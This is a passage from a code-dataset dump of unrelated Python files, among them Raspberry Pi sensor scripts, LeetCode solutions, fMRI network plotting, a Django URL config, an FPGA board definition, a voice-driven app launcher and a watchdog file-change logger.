current_day):\n\t\tif not self.is_isolated:\n\t\t\tself.is_isolated = True\n\t\t\tself.day_isolated = current_day\n","sub_path":"simulator/simulator_local/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"558980788","text":"def solution(data):\n sum0 , sum1 = 0 , 0\n for i in range(len(data)//2):\n sum0 += i\n for i in range(len(data)//2 , len(data)):\n sum1 += i\n if (sum0 == sum1):\n return 'LUCKY'\n else:\n return 'READY'\n\ndata = 
[123402]\nprint(solution(data))","sub_path":"08_test/02implement/t07.py","file_name":"t07.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"189403372","text":"import json\n\nfoo = dict(\n average_name_length = 1,\n pct_with_timezone = 1,\n avg_number_of_hashtags = 1,\n avg_retweets = 1,\n pct_with_location = 1,\n most_popular_language = 1\n )\n\nbar = json.dumps(foo)\n\nprint(bar)\n","sub_path":"report-project/scratch/agg.py","file_name":"agg.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"186022184","text":"#!/usr/bin/python\n\nimport os # import os for sending messages to PD\nimport spidev # import the spidev module\nimport time # import time for the sleep function\nimport RPi.GPIO as GPIO\n\n# Open SPI bus\nspi = spidev.SpiDev()\nspi.open(0,0)\nspi.max_speed_hz=1000000\n\nwaitTime = .04\nbounceTime = 0.1\n\nbtn1alreadyPressed = False\nbtn2alreadyPressed = False\nbtn3alreadyPressed = False\nbtn4alreadyPressed = False\n\nGPIO.setmode(GPIO.BCM)\n## GPIO.setup(4, GPIO.IN, pull_up_down=GPIO.PUD_UP)\nGPIO.setup(4, GPIO.IN)\nGPIO.setup(17, GPIO.IN)\nGPIO.setup(18, GPIO.IN)\nGPIO.setup(27, GPIO.IN)\n \ndef send2Pd(message=''):\n # Send a message to Pd\n os.system(\"echo '\" + message + \"' | pdsend 3000 localhost udp\")\n\ndef readadc(channel):\n if channel > 7 or channel < 0:\n return -1 \n\n # spi.xfer2 sends three bytes and returns three bytes:\n # byte 1: the start bit (always 0x01)\n # byte 2: configure bits, see MCP3008 datasheet table 5-2\n # byte 3: don't care\n r = spi.xfer2([1, 8 + channel << 4, 0])\n\n # Three bytes are returned; the data (0-1023) is in the\n # lower 3 bits of byte 2, and byte 3 (datasheet figure 6-1)\n v = ((r[1] & 3) << 8) + r[2]\n\n return v;\n\nwhile True:\n btn1pressed = not GPIO.input(4)\n btn2pressed = not GPIO.input(17)\n btn3pressed = not GPIO.input(18)\n btn4pressed = not GPIO.input(27)\n\n if btn1pressed and not btn1alreadyPressed:\n# print('1 Pressed')\n message = '8 1'\n send2Pd(message)\n btn1alreadyPressed = btn1pressed\n\n if btn2pressed and not btn2alreadyPressed:\n# print('2 Pressed')\n message = '8 2'\n send2Pd(message)\n btn2alreadyPressed = btn2pressed\n\n if btn3pressed and not btn3alreadyPressed:\n# print('3 Pressed')\n message = '8 3'\n send2Pd(message)\n btn3alreadyPressed = btn3pressed\n\n if btn4pressed and not btn4alreadyPressed:\n# print('4 Pressed')\n message = '8 4'\n send2Pd(message)\n btn4alreadyPressed = btn4pressed\n\n values = [0]*8\n \n for i in range(8):\n values[i] = readadc(i)\n message = str(i) + ' ' + str(values[i]) # make a string for use with Pdsend\n send2Pd(message)\n\n# consider creating a message that has all values in one string rather than separate messages\n print('| {0:>4} | {1:>4} | {2:>4} | {3:>4} | {4:>4} | {5:>4} | {6:>4} | {7:>4} |'.format(*values))\n# print(message)\n time.sleep(waitTime)\n","sub_path":"python-scripts/lop2pd.py","file_name":"lop2pd.py","file_ext":"py","file_size_in_byte":2431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"108101415","text":"class university:\n \n def _init_(self):\n self.marks=-1\n self.age=0\n self.stud_id=\"\"\n \n def validate_marks(self):\n if self.marks>=0 and self.marks<=100:\n return True\n else:\n return False\n \n def validate_age(self):\n if (self.age>=21):\n return True\n else:\n return False\n \n def 
check_qualification(self):\n if (self.validate_age() is True and self.validate_marks() is True):\n if self.marks>=65:\n return True\n else:\n return False\n else:\n return False\n \n def setter(self,marks,age,stud_id):\n self.marks=marks\n self.age=age\n self.stud_id=stud_id\n \n def getter(self):\n print(\"Student ID : \",self.stud_id)\n print(\"Age : \",self.age)\n print(\"Marks : \",self.marks)\n \n\n\nsid = input(\"Enter the Student ID - \")\na = int(input(\"Enter the age of the student - \"))\nm = int(input(\"Enter the marks obtained by the student - \"))\nprint(\"\\n\\n\")\n\nstud1 = university()\nstud1.setter(m,a,sid)\nstud1.getter()\nprint(\"\\n\")\n\nif stud1.check_qualification() is True:\n print(stud1.stud_id,\" is Qualified!\")\nelse:\n print(stud1.stud_id,\" is not Qualified\")\n","sub_path":"Lab_4.py","file_name":"Lab_4.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"551447583","text":"# Copyright (C) 2015 Canonical Ltd.\n# Author: Barry Warsaw \n\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; version 3 of the License.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n\n__all__ = [\n \"chdir\",\n ]\n\n\nimport os\n\nfrom contextlib import contextmanager\n\n\n@contextmanager\ndef chdir(directory):\n \"\"\"With-statement for temporarily changing current working directory.\"\"\"\n old_dir = os.getcwd()\n try:\n os.chdir(directory)\n yield\n finally:\n os.chdir(old_dir)\n","sub_path":"lib/systemimage/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"54692228","text":"\"\"\"\n247. Strobogrammatic Number II\nMedium\n\nA strobogrammatic number is a number that looks the same when rotated 180 degrees (looked at upside down).\n\nFind all strobogrammatic numbers that are of length = n.\n\nExample:\n\nInput: n = 2\nOutput: [\"11\",\"69\",\"88\",\"96\"]\n\"\"\"\n\nfrom typing import List\n\n###############################################################################\n\"\"\"\nSolution: build all strobogrammatic numbers of length n iteratively.\nBuild prefixes and suffixes for each number.\n\nNote: \"00\" is not a valid length 2 strobogrammatic number. 
\nThe integer 0 corresponds to \"0\", which has length 1.\nIn general, the first char in a strobogrammatic number cannot be \"0\".\n\nRange of indices to process:\n\nn = 1\nindices: 0\n\nn = 2\nindices: 0 1\nrange(1)\n\nn = 3\nindices: 0 1 2\nrange(1)\n\nn = 4\nindices: 01 23\nrange(2)\n\nn = 5\nindices: 01 2 34\nrange(2)\n\n\"\"\"\nclass Solution:\n def findStrobogrammatic(self, n: int) -> List[str]:\n d = {'0': '0', '1': '1', '6': '9', '8': '8', '9': '6'}\n\n res = [('', '')] # tuples of prefix and suffix for each number\n\n for i in range(n//2):\n new_res = []\n\n for ch in d:\n if i == 0 and ch == '0': # don't use '0' as first digit\n continue\n\n for s1, s2 in res:\n new_res.append((s1 + ch, d[ch] + s2))\n \n res = new_res\n\n if n % 2 == 1:\n return [s1 + ch + s2 for s1, s2 in res for ch in ['0','1','8']]\n\n return [s1 + s2 for s1, s2 in res]\n\n\"\"\"\nSolution 1b: same idea, but written differently.\n\nUpdate \"res\" using list comprehensions, and avoid using temp list \"new_res\".\n\"\"\"\nclass Solution1b:\n def findStrobogrammatic(self, n: int) -> List[str]:\n d = {'0': '0', '1': '1', '6': '9', '8': '8', '9': '6'}\n\n res = [('', '')] # tuples of prefix and suffix for each number\n\n for i in range(n//2):\n if i == 0: # don't use '0' as first digit\n res = [(s1 + ch, d[ch] + s2) for s1, s2 in res \n for ch in ('1','6','8','9')]\n else:\n res = [(s1 + ch, d[ch] + s2) for s1, s2 in res for ch in d]\n \n if n % 2 == 1:\n return [s1 + ch + s2 for s1, s2 in res for ch in ['0','1','8']]\n\n return [s1 + s2 for s1, s2 in res]\n\n###############################################################################\n\"\"\"\nSolution 2: build iteratively, from middle of each number to both ends.\n\"\"\"\nclass Solution2:\n def findStrobogrammatic(self, n: int) -> List[str]:\n res = ['0', '1', '8'] if (n % 2 == 1) else ['']\n \n if n < 2:\n return res\n\n while len(res[0]) < n:\n new_res = []\n\n for s in res:\n if len(s) < n - 2: # don't use '0' on last iteration\n new_res.append('0' + s + '0')\n\n new_res.append('1' + s + '1')\n new_res.append('6' + s + '9')\n new_res.append('8' + s + '8')\n new_res.append('9' + s + '6')\n\n res = new_res\n\n return res\n\n\"\"\"\nSolution 2b: same as sol 1b, but with some optimizations.\n\"\"\"\nclass Solution2b:\n def findStrobogrammatic(self, n: int) -> List[str]:\n res = ['0', '1', '8'] if n & 1 else ['']\n \n if n < 2:\n return res\n\n k = len(res[0])\n \n while k < n:\n new_res = []\n k += 2 # length of new strings\n\n for s in res:\n if k < n: # don't use '0' on last iteration\n new_res.extend(['0'+s+'0', \n '1'+s+'1', '6'+s+'9', '8'+s+'8', '9'+s+'6'])\n else:\n new_res.extend(['1'+s+'1', '6'+s+'9', '8'+s+'8', '9'+s+'6'])\n\n res = new_res\n\n return res\n\n\"\"\"\nSolution 2c: same as sol 1c, but using a \"for\" loop.\n\"\"\"\nclass Solution2c:\n def findStrobogrammatic(self, n: int) -> List[str]:\n res = ['0', '1', '8'] if n & 1 else ['']\n \n if n < 2:\n return res\n\n start = len(res[0]) + 2\n\n for k in range(start, n+1, 2): # length of new strings\n new_res = []\n\n for s in res:\n if k < n: # don't use '0' on last iteration\n new_res.extend(['0'+s+'0', \n '1'+s+'1', '6'+s+'9', '8'+s+'8', '9'+s+'6'])\n else:\n new_res.extend(['1'+s+'1', '6'+s+'9', '8'+s+'8', '9'+s+'6'])\n\n res = new_res\n\n return res\n\n###############################################################################\n\"\"\"\nSolution 3: recursion\n\"\"\"\nclass Solution3:\n def findStrobogrammatic(self, n: int) -> List[str]:\n def rec(n):\n if n == 0:\n return ['']\n if n == 
1:\n return ['0', '1', '8']\n\n return [ch + s + d[ch] for ch in d for s in rec(n-2)]\n \n if n == 1:\n return ['0', '1', '8']\n\n d = {'0': '0', '1': '1', '6': '9', '8': '8', '9': '6'} \n\n #return [s for s in rec(n) if s[0] != '0'] # alternative\n return [ch + s + d[ch] for ch in ['1','6','8','9'] for s in rec(n-2)]\n\n###############################################################################\n\nif __name__ == \"__main__\":\n def test(n, comment=None):\n print(\"=\"*80)\n if comment:\n print(comment)\n\n print()\n print(f\"n = {n}\")\n\n res = sol.findStrobogrammatic(n)\n \n print(f\"\\nres = {res}\")\n print(f\"\\nlen = {len(res)}\\n\")\n\n\n sol = Solution() # iterative\n sol = Solution1b() \n \n sol = Solution2() # iterative, build from middle of each number\n sol = Solution2b()\n sol = Solution2c()\n\n #sol = Solution3() # recursive\n\n comment = 'LC ex; answer = [\"11\",\"69\",\"88\",\"96\"]'\n n = 2\n test(n, comment)\n\n comment = \"\"\n n = 1\n test(n, comment)\n\n comment = \"\"\n n = 3\n test(n, comment)\n\n comment = \"\"\n n = 4\n test(n, comment)\n\n comment = \"\"\n n = 5\n test(n, comment)\n","sub_path":"math/0247_strobogrammatic_number_ii.py","file_name":"0247_strobogrammatic_number_ii.py","file_ext":"py","file_size_in_byte":6030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"595975629","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport networkx as nx\nimport community # Louvain method\n\n# ROI IDs\n# Left precentral gyrus: 50\n# Left post-cingulate, precuneus: 174\n\n##### Custom distinct color function --- to be used later\ndef get_cmap(n, name='hsv'):\n '''Returns a function that maps each index in 0, 1, ..., n-1 to a distinct \n RGB color; the keyword argument name must be a standard mpl colormap name.'''\n return plt.cm.get_cmap(name, n)\n\n\n####### Loading the network data\nfTS = 'DatafMRIPreprop/NewYork_sub83453_Rt2_K200.npz'\nnodes = np.load(fTS)['nodes']\nxyz = np.load(fTS)['xyz']\nfG = 'DatafMRIPreprop/NewYork_sub83453_Rt2_K200_deg20.adjlist'\nfG_ms = 'DatafMRIPreprop/NewYork_sub83453_ms_Rt2_K200_deg20.adjlist'\nG = nx.read_adjlist(fG, nodetype=int)\nG_ms = nx.read_adjlist(fG_ms, nodetype=int)\nG_list = [G, G_ms]\nnetLabel = ['Without motion scrubbing',\n 'With motion scrubbing']\n\n\n####### Finding the giant component and modular partition\npartition_list = []\nGC_list = []\nfor iG in G_list:\n # finding the giant component\n GC_nodes = max(nx.connected_components(iG), key=len) \n GC = iG.subgraph(GC_nodes)\n GC_list.append(iG)\n ###### modular partition by Louvain\n partition = community.best_partition(GC)\n partition_list.append(partition)\n\n\n\n###### drawing the graph\n# dictionary of xy-coordinates\npos = {}\nfor iROI in range(len(nodes)):\n pos[nodes[iROI]] = xyz[iROI,:2]\n\n# Loop over states for visualization\nplt.figure(figsize=[6,4])\nfor i,iGC in enumerate(GC_list):\n \n # finally, graph with communities in different colors (Louvain)\n plt.subplot(1,2,i+1)\n nComm = max([comm for comm in partition_list[i].values()])+1\n node_color_list = get_cmap(nComm+1,'rainbow')\n for iComm in range(nComm):\n nodeList = [iNode for iNode,Comm in partition_list[i].items()\n if Comm==iComm]\n nx.draw_networkx_nodes(iGC, pos, \n nodelist=nodeList,\n node_color = np.array([node_color_list(iComm)]),\n node_size=30)\n nx.draw_networkx_edges(iGC, pos, width=0.25,\n edge_color='lightblue')\n plt.title(netLabel[i])\n plt.axis('off')\n\nplt.subplots_adjust(left=0.01, right=0.99, wspace=0.05,\n 
bottom=0.025, top=0.85)\nplt.show()\n\n\n\n\n###### drawing the graph (SM module)\n# Identifying SM module for each network\nROI_SM = 50 # ROI=50 --> Left precentral gyrus\nindSM_list = []\nfor iMod in partition_list:\n indSM_list.append(iMod[ROI_SM])\n \n# Loop over states for visualization\nplt.figure(figsize=[6,4])\nfor i,iGC in enumerate(GC_list):\n \n # finally, graph with communities in different colors (Louvain)\n plt.subplot(1,2,i+1)\n nComm = max([comm for comm in partition_list[i].values()])+1\n for iComm in range(nComm):\n nodeList = [iNode for iNode,Comm in partition_list[i].items()\n if Comm==iComm]\n if iComm==indSM_list[i]:\n nx.draw_networkx_nodes(iGC, pos, \n nodelist=nodeList,\n node_color = 'orangered',\n node_size=30)\n else:\n nx.draw_networkx_nodes(iGC, pos, \n nodelist=nodeList,\n node_color = 'skyblue',\n node_size=15)\n \n nx.draw_networkx_edges(iGC, pos, width=0.25,\n edge_color='lightblue')\n plt.title(netLabel[i])\n plt.axis('off')\n\nplt.suptitle('Sensory-motor module', size=16)\nplt.subplots_adjust(left=0.01, right=0.99, wspace=0.05,\n bottom=0.025, top=0.85)\nplt.show()\n\n\n\n\n\n###### drawing the graph (DMN module)\n# Identifying DMN module for each network\nROI_DMN = 174 # ROI=174 --> Left posterior cingulate / precuneus\nindDMN_list = []\nfor iMod in partition_list:\n indDMN_list.append(iMod[ROI_DMN])\n \n# Loop over states for visualization\nplt.figure(figsize=[6,4])\nfor i,iGC in enumerate(GC_list):\n \n # finally, graph with communities in different colors (Louvain)\n plt.subplot(1,2,i+1)\n nComm = max([comm for comm in partition_list[i].values()])+1\n for iComm in range(nComm):\n nodeList = [iNode for iNode,Comm in partition_list[i].items()\n if Comm==iComm]\n if iComm==indDMN_list[i]:\n nx.draw_networkx_nodes(iGC, pos, \n nodelist=nodeList,\n node_color = 'orangered',\n node_size=30)\n else:\n nx.draw_networkx_nodes(iGC, pos, \n nodelist=nodeList,\n node_color = 'skyblue',\n node_size=15)\n \n nx.draw_networkx_edges(iGC, pos, width=0.25,\n edge_color='lightblue')\n plt.title(netLabel[i])\n plt.axis('off')\n\nplt.suptitle('Default mode network module', size=16)\nplt.subplots_adjust(left=0.01, right=0.99, wspace=0.05,\n bottom=0.025, top=0.85)\nplt.show()\n","sub_path":"fMRIPreprop/ModulesMS.py","file_name":"ModulesMS.py","file_ext":"py","file_size_in_byte":5185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"634519267","text":"from django.conf.urls.defaults import patterns\n\nurlpatterns = patterns('amazon.views',\n (r'^$', 'index'),\n (r'^textBookList/$', 'textBookList'),\n (r'^showRanksForBook/(?P.*)$', 'showRanksForBook'),\n (r'^showRanksByDate/(?P.*)$', 'showRanksByDate'),\n (r'^showBookRankGraph/', 'showBookRankGraph'),\n (r'^showTweetsForBook', 'showTweetsForBook'),\n (r'^getTweets', 'getTweets'),\n (r'^static/(?P.*)$', 'serveStaticFile'),\n)","sub_path":"python/django-bookbuzz/amazon/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"307821312","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.metrics import mean_squared_error\nimport math\n\ndataset = pd.read_csv(\"D:\\\\Python\\\\Machine Learning\\\\01 Linear Reg\\\\mycsv.csv\")\nsize = dataset['sizeList']\nprice = dataset['priceList']\n\nx = np.array(size).reshape(-1,1)\ny = 
np.array(price).reshape(-1,1)\n\nprint(x)\n\n# Fit the model; LinearRegression solves the least-squares optimization problem\nmodel = LinearRegression()\nmodel.fit(x, y)\n\n# MSE and R value\n\n# MSE compares the true targets with the model's predictions\nregression_model_mse = mean_squared_error(y, model.predict(x))\nprint(\"RMSE : \", math.sqrt(regression_model_mse))\nprint(\"R squared value : \", model.score(x,y))\n\n# y = b0+b1x\n#b0\nprint(\"b0 : \",model.intercept_[0])\n\n#b1\nprint(\"b1 : \",model.coef_[0])\n\nplt.scatter(x, y, color='green')\nplt.plot(x, model.predict(x), color = 'black')\nplt.title(\"Linear Regression\")\nplt.xlabel(\"Land Size\")\nplt.ylabel(\"Price\")\nplt.show()\n\nprint(\"Prediction by the model: \", model.predict([[50]]))\n\n","sub_path":"Machine Learning/Udemy ML/01 Linear Reg/linearreg.py","file_name":"linearreg.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"36680881","text":"import magma as m\nfrom loam.parts.xilinx.spartan3 import XC3S250E\nfrom loam.parts.generic.crystal import Crystal\n#from loam.parts.ftdi.ft232r import FT232R\n#from loam.peripherals.timer import Timer\n\nfrom .papilio import Papilio\n\n'''\nSPECS: Xilinx XC3S250E\n----------------------------------\nLogic Cells                : 5508\nCLBs                       : 612\nDistributed RAM bits       : 38K\nBlock RAM bits             : 216K\nDCMs                       : 4\nMax User I/O               : 172\nMax Differential I/O Pairs : 68\n----------------------------------\n'''\n\n#\n# UCF file for the Papilio One board\n# Generated by pin_converter, written by Kevin Lindsey\n# https://github.com/thelonious/papilio_pins/tree/development/pin_converter\n\n# Main board wing pin [] to FPGA pin Pxx map\n#        -------C-------  -------B-------  -------A-------\n# [GND]  [C00]       P91  [GND] [B00]  P85  P86  [A15]\n# [2V5]  [C01]       P92  [2V5] [B01]  P83  P84  [A14]\n# [3V3]  [C02]       P94  [3V3] [B02]  P78  P79  [A13]\n# [5V0]  [C03]       P95  [5V0] [B03]  P71  P70  [A12]\n#        [C04]       P98        [B04]  P68  P67  [A11]  [5V0]\n#        [C05]       P2         [B05]  P66  P65  [A10]  [3V3]\n#        [C06]       P3         [B06]  P63  P62  [A09]  [2V5]\n#        [C07]       P4         [B07]  P61  P60  [A08]  [GND]\n# [GND]  [C08]       P5   [GND] [B08]  P58  P57  [A07]\n# [2V5]  [C09]       P9   [2V5] [B09]  P54  P53  [A06]\n# [3V3]  [C10]       P10  [3V3] [B10]  P41  P40  [A05]\n# [5V0]  [C11]       P11  [5V0] [B11]  P36  P35  [A04]\n#        [C12]       P12        [B12]  P34  P33  [A03]  [5V0]\n#        [C13]       P15        [B13]  P32  P26  [A02]  [3V3]\n#        [C14]       P16        [B14]  P25  P23  [A01]  [2V5]\n#        [C15]       P17        [B15]  P22  P18  [A00]  [GND]\n#\nclass PapilioOne(Papilio):\n\n    def __init__(self, fpga=XC3S250E):\n        super(PapilioOne,self).__init__(\"PapilioOne\")\n\n        # Need to define the interface ...\n\n        self.fpga = fpga = fpga(board=self)\n\n        self.A = [fpga.P18, fpga.P23, fpga.P26, fpga.P33, \n                  fpga.P35, fpga.P40, fpga.P53, fpga.P57,\n                  fpga.P60, fpga.P62, fpga.P65, fpga.P67, \n                  fpga.P70, fpga.P79, fpga.P84, fpga.P86]\n\n        self.B = [fpga.P85, fpga.P83, fpga.P78, fpga.P71, \n                  fpga.P68, fpga.P66, fpga.P63, fpga.P61,\n                  fpga.P58, fpga.P54, fpga.P41, fpga.P36, \n                  fpga.P34, fpga.P32, fpga.P25, fpga.P22]\n\n        self.C = [fpga.P91, fpga.P92, fpga.P94, fpga.P95, \n                  fpga.P98, fpga.P2,  fpga.P3,  fpga.P4,\n                  fpga.P5,  fpga.P9,  fpga.P10, fpga.P11,\n                  fpga.P12, fpga.P15, fpga.P16, fpga.P17]\n\n        # Clock setup\n        self.CLKIN = fpga.P89\n        self.CLKIN.rename('CLKIN')\n\n        #print('wiring crystal')\n        self.Crystal = Crystal(32000000, board=self)\n        m.wire(self.Crystal.O, self.CLKIN.I)\n\n        #print('wiring clock')\n        self.Clock = fpga.clock\n        m.wire(self.CLKIN.O, self.Clock.I)\n\n\n        # Timer peripheral setup\n        #print('wiring timer')\n        # self.Timer = Timer(fpga, name='systimer')\n\n\n        # USART setup\n        self.RX = fpga.P88\n        self.RX.rename('RX').input()\r\n\r\n        
self.TX = fpga.P90\n self.TX.rename('TX').output()\n\n #print('wiring uart')\n #self.usart = FT232R(board=self)\n #m.wire(self.TX, self.usart.RX)\n #m.wire(self.usart.TX, self.RX)\n\n #self.usart0 = fpga.USART(fpga)\n #self.usart.peripheral(self.usart0)\n #m.wire(self.usart0.TX, self.TX)\n #m.wire(self.RX, self.usart0.RX)\n\n\n # Flash setup\n #self.CS = fpga.P24\n #self.SCLK = fpga.P50\n #self.MOSI = fpga.P27\n #self.MISO = fpga.P44\n\n #self.Flash = Flash(self)\n #self.SCLK.rename('SCLK').output()\n #self.MOSI.rename('MOSI').output()\n #self.MISO.rename('MISO').output()\n #self.CS. rename('CS') .output()\n #m.wire(self.SCLK, self.Flash.SCLK)\n #m.wire(self.MOSI, self.Flash.MOSI)\n #m.wire(self.Flash.MISO, self.MISO)\n #m.wire(self.CS, self.Flash.CS)\n\n","sub_path":"loam/boards/papilioone.py","file_name":"papilioone.py","file_ext":"py","file_size_in_byte":4038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"175412921","text":"import pyttsx3\r\nimport os\r\n\r\npyttsx3.speak(\"Welcome to my Tools\")\r\n\r\npyttsx3.speak(\"Here are all the application that you run\")\r\nprint(\"********************************************************\")\r\nprint(\" Chrome \")\r\nprint(\" YouTube \")\r\nprint(\" Paint \")\r\nprint(\" AnyDesk \")\r\nprint(\" Telegram \")\r\nprint(\" WordPad \")\r\nprint(\" Notepad++ \")\r\nprint(\" Windows Media Player \")\r\nprint(\" MS Word \")\r\nprint(\" MS PowerPoint \")\r\nprint(\" MS Excel \")\r\nprint(\"********************************************************\")\r\n\r\npyttsx3.speak(\"What application you want to run\")\r\n\r\nwhile True:\r\n print(\"Application you want to run\",end= \"\")\r\n p = input()\r\n\r\n if (\"not \" in p) or (\"donot\" in p) or (\"don't\" in p):\r\n pyttsx3.speak(\"Can't open this Application. 
Try something else\")\r\n        print(\"can't open \",p)\r\n    elif ((\"run\" in p) or (\"execute\" in p)) and (\"chrome\" in p):\r\n        pyttsx3.speak(\"Opening Chrome\")\r\n        os.system(\"chrome\")\r\n    elif ((\"run\" in p) or (\"execute\" in p)) and (\"youtube\" in p):\r\n        pyttsx3.speak(\"Opening youtube\")\r\n        os.system(\"chrome youtube.com\")\r\n    elif ((\"run\" in p) or (\"execute\" in p)) and (\"paint\" in p):\r\n        pyttsx3.speak(\"Opening Paint\")\r\n        os.system(\"mspaint\")\r\n    elif ((\"run\" in p) or (\"execute\" in p)) and (\"anydesk\" in p):\r\n        pyttsx3.speak(\"Opening AnyDesk\")\r\n        os.system(\"AnyDesk\")\r\n    elif ((\"run\" in p) or (\"execute\" in p)) and (\"telegram\" in p):\r\n        pyttsx3.speak(\"Opening Telegram\")\r\n        os.system(\"telegram\")\r\n    elif ((\"run\" in p) or (\"execute\" in p)) and (\"wordpad\" in p):\r\n        pyttsx3.speak(\"Opening word pad\")\r\n        os.system(\"wordpad\")\r\n    elif ((\"run\" in p) or (\"execute\" in p)) and (\"notepad++\" in p):\r\n        pyttsx3.speak(\"Opening notepad ++\")\r\n        os.system(\"notepad++\")\r\n    elif ((\"run\" in p) or (\"execute\" in p)) and ((\"notepad\" in p) or (\"editor\" in p)):\r\n        pyttsx3.speak(\"Opening Notepad\")\r\n        os.system(\"notepad\")\r\n    elif ((\"run\" in p) or (\"execute\" in p)) and (\"player\" in p) and (\"media\" in p):\r\n        pyttsx3.speak(\"Opening Windows Media Player\")\r\n        os.system(\"wmplayer\")\r\n    elif ((\"run\" in p) or (\"execute\" in p)) and (\"microsoft\" in p) and (\"office\" in p) and (\"word\" in p):\r\n        pyttsx3.speak(\"Opening MS Word\")\r\n        os.system(\"winword\")\r\n    elif ((\"run\" in p) or (\"execute\" in p)) and (\"microsoft\" in p) and (\"office\" in p) and (\"powerpoint\" in p):\r\n        pyttsx3.speak(\"Opening MS Powerpoint\")\r\n        os.system(\"powerpnt\")\r\n    elif ((\"run\" in p) or (\"execute\" in p)) and (\"microsoft\" in p) and (\"office\" in p) and (\"excel\" in p):\r\n        pyttsx3.speak(\"Opening Excel\")\r\n        os.system(\"excel\")\r\n    elif (\"exit\" in p) or (\"quit\" in p):\r\n        pyttsx3.speak(\"Exiting from the Software\")\r\n        break\r\n    else:\r\n        print(\"Not supported... please install that application\")\r\n\r\n","sub_path":"humanProj.py","file_name":"humanProj.py","file_ext":"py","file_size_in_byte":3371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"531311165","text":"import re\n\n# Check whether the DEL key character (0x7F) is contained in a string\n\np = re.compile(r'[\\u007F]+')\n\nmoji = 'あいう' + '\\u007F' + 'dd'\nprint(moji)\nmoji2 = 'bb上お'\n\nif p.findall(moji):\n    print('found')\n\nif p.findall(moji2):\n    print('found')\nelse:\n    print('not found')\n\n# A plain membership test is faster than the simple regular expression\nif '\\u007F' in moji:\n    print('the in operator finds it too!!') ","sub_path":"cheat_sheet/del_key_chk_smp.py","file_name":"del_key_chk_smp.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"508681416","text":"#!/usr/bin/env python\r\n\r\nimport subprocess\r\nimport shlex\r\nfrom lib import *\r\n\r\ndef main():\r\n    program_l = [\"program1\", \"program2\", \"program3\"]\r\n    task_gr = tsk.TaskGroup()\r\n    # Create Tasks\r\n    for pname in program_l:\r\n        cmd = \"python ./programs/%s.py\" % pname\r\n        task_gr.AddTask(tsk.Task(cmd))\r\n    # Launch Tasks\r\n    task_gr.LaunchInParallel()\r\n    # Wait for Tasks\r\n    task_gr.WaitForAll()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    main()","sub_path":"task_group.py","file_name":"task_group.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"68210152","text":"import time \nfrom watchdog.observers import Observer \nfrom watchdog.events import FileSystemEventHandler \nimport csv\nfrom datetime import datetime\nimport os\nimport psutil\n\nglobal logFile, script\n\nlogFile = 'D:/LogFile.csv'\nscript = 'D:/Latihan Python/Tkinter/Logging/script.pyw'\n\n\nclass OnMyWatch(): \n # Set the directory on watch \n # watchDirectory = input('Input short path:')\n \n def __init__(self): \n self.observer = Observer() \n\n def run(self, path): \n event_handler = Handler() \n self.path = path\n self.observer.schedule(event_handler, self.path, recursive = True) \n self.observer.start() \n try: \n while True: \n time.sleep(5) \n except: \n self.observer.stop() \n print(\"[*]Logging has stopped\\n\") \n \n self.observer.join()\n\n def showlog(self):\n count = 0\n print('\\n[*]Press CTRL + C to Stop Logging')\n print('[*]Logging has started...')\n \n with open('D:\\\\LogFile.csv') as csv_file:\n print(\"DATE\\t\\t TIME\\t\\t\\t EVENT\\t ADDRESS\")\n csv_reader = csv.reader(csv_file, delimiter=',')\n for row in csv_reader:\n count = count + 1\n print(row[0],'|',row[1],'|',row[2],'|', row[3])\n # print('\\n')\n\n if count == 0:\n print(\"\\t\\tErr!!(NoLogFiles)\\n\")\n \n \nclass Handler(FileSystemEventHandler): \n \n @staticmethod\n def on_any_event(event):\n\n if event.is_directory: \n return None\n \n elif event.event_type == 'created' and event.src_path != logFile and event.src_path != script: \n # Event is created, you can process it now\n csv.writer(open(logFile, mode='a+', newline=''), delimiter=',').writerow([datetime.date(datetime.now()), datetime.time(datetime.now()), event.event_type, event.src_path]) \n print(\"Watchdog received created event - % s.\" % event.src_path)\n\n elif event.event_type == 'modified' and event.src_path != logFile and event.src_path != script: \n # Event is modified, you can process it now\n csv.writer(open(logFile, mode='a+', newline=''), delimiter=',').writerow([datetime.date(datetime.now()), datetime.time(datetime.now()),event.event_type, event.src_path]) \n print(\"Watchdog 